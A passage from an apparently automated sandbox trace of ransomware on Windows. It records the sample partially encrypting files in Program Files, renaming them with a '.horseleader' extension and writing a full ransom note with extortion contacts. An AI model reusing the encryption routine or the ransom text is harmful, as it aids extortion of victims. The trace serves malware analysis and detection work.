dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 
[0248.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS") returned 77 [0248.340] StrStrW (lpFirst="MSB1ENFR.ITS", lpSrch=".txt") returned 0x0 [0248.340] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=943322) returned 1 [0248.340] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.340] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.343] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.344] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.345] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x70a6d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.345] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.347] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.347] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.348] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xe14da, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.348] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.350] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.350] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.351] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.351] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.351] CloseHandle (hObject=0x1a4) returned 1 [0248.351] GetProcessHeap () returned 0x780000 [0248.351] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.351] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.horseleader") returned 89 [0248.352] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\TRANSLAT\\ENFR\\MSB1ENFR.ITS.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\msb1enfr.its.horseleader")) returned 1 [0248.353] GetProcessHeap () returned 0x780000 [0248.353] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.353] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c637800, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c637800, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0xe64da, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ENFR.ITS", cAlternateFileName="")) returned 0 [0248.353] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.353] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\#Decrypt#.txt") returned 78 [0248.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ENFR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\enfr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.354] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0248.354] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.355] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.355] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.355] CloseHandle (hObject=0x158) returned 1 [0248.355] 
GetProcessHeap () returned 0x780000 [0248.355] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.355] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ESEN", cAlternateFileName="")) returned 1 [0248.356] lstrcmpiW (lpString1="ESEN", lpString2="Windows") returned -1 [0248.356] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN") returned 64 [0248.356] lstrcmpW (lpString1="ESEN", lpString2=".") returned 1 [0248.356] lstrcmpW (lpString1="ESEN", lpString2="..") returned 1 [0248.356] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.356] GetProcessHeap () returned 0x780000 [0248.356] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.356] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*") returned 66 [0248.356] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.356] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.357] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\.") returned 66 [0248.357] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.357] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54a7f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0248.357] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0248.357] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\..") returned 67 [0248.357] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0248.357] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0248.357] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9890c900, ftCreationTime.dwHighDateTime=0x1c82168, ftLastAccessTime.dwLowDateTime=0x54a7f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9890c900, ftLastWriteTime.dwHighDateTime=0x1c82168, nFileSizeHigh=0x0, nFileSizeLow=0x38200, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ESEN.DLL", cAlternateFileName="")) returned 1 [0248.357] lstrcmpiW (lpString1="MSB1ESEN.DLL", lpString2="Windows") returned -1 [0248.357] wnsprintfW (in: pszDest=0x7dc820, 
cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0248.357] StrStrIW (lpFirst="MSB1ESEN.DLL", lpSrch=".horseleader") returned 0x0 [0248.357] lstrcmpW (lpString1="MSB1ESEN.DLL", lpString2="#Decrypt#.txt") returned 1 [0248.357] lstrcmpW (lpString1="MSB1ESEN.DLL", lpString2="_uninstalling_.png") returned 1 [0248.357] lstrlenW (lpString=".testttjffg") returned 11 [0248.357] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL", lpSrch=".testttjffg") returned 0x0 [0248.357] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.357] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.357] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL") returned 77 [0248.358] StrStrW (lpFirst="MSB1ESEN.DLL", lpSrch=".txt") returned 0x0 [0248.358] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=229888) returned 1 [0248.358] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.358] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) 
returned 1 [0248.361] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.361] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.363] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x19900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.363] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.363] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.363] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.364] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x33200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.364] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 
[0248.366] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.366] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.366] CloseHandle (hObject=0x1a4) returned 1 [0248.367] GetProcessHeap () returned 0x780000 [0248.367] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0248.367] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.horseleader") returned 89 [0248.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.dll.horseleader")) returned 1 [0248.368] GetProcessHeap () returned 0x780000 [0248.368] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0248.368] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22595900, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x54ce0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22595900, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, 
nFileSizeHigh=0x0, nFileSizeLow=0xff7f2, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="MSB1ESEN.ITS", cAlternateFileName="")) returned 1 [0248.368] lstrcmpiW (lpString1="MSB1ESEN.ITS", lpString2="Windows") returned -1 [0248.368] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0248.368] StrStrIW (lpFirst="MSB1ESEN.ITS", lpSrch=".horseleader") returned 0x0 [0248.368] lstrcmpW (lpString1="MSB1ESEN.ITS", lpString2="#Decrypt#.txt") returned 1 [0248.368] lstrcmpW (lpString1="MSB1ESEN.ITS", lpString2="_uninstalling_.png") returned 1 [0248.368] lstrlenW (lpString=".testttjffg") returned 11 [0248.368] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS", lpSrch=".testttjffg") returned 0x0 [0248.368] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.368] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.369] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\msb1esen.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.369] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\MSB1ESEN.ITS") returned 77 [0248.369] StrStrW (lpFirst="MSB1ESEN.ITS", lpSrch=".txt") returned 0x0 [0248.369] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1046514) returned 1 [0248.369] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.369] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.372] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.372] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.372] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x7d3f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.373] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.376] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.376] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.377] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfa7f2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.377] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.379] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0248.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.380] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.380] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: 